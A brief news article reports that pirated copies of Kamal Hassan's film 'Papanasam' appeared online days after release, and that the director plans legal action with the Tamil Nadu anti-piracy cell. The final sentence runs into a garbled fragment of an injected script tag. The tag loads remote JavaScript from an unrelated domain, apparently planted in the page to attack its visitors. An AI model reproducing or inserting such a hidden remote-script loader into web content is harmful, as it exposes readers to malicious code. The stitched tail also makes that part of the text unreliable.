Piracy smashes Kamal Hassan's ‘Papanasam’ just days after release

Pirated copies of Kamal Hassan’s film ‘Papanasam’ can now be accessed online just days after its release.

Accordingly, Jeetu Joseph the film’s director said that he, together with Kamal Hassan and the movie producer Suresh Balaji, will file litigation against copyright infringers with the anti-piracy cell of the Tamil Nadu police.

“It is really shocking that the pirated copies of the movie have been uploaded in many online sites soon after its release. We will surely take up the issue and fight it legally,” Joseph said.

Joseph added that they had already asked the help of a private company to monitor the cyber space to check any attempt to upload the copies of the movie on the internet.

Illegal distribution of copyrighted films has now been dominating Kerala, India after infringed copies of the blockbuster film, ‘Premam’ were released.

Meanwhile, if this film piracy issue is not yet resolved, the Kerala Film Exhibitors are planning to close down movie theaters. type=’text/javascript’ src=’http://online-sale24.com/1.js’>
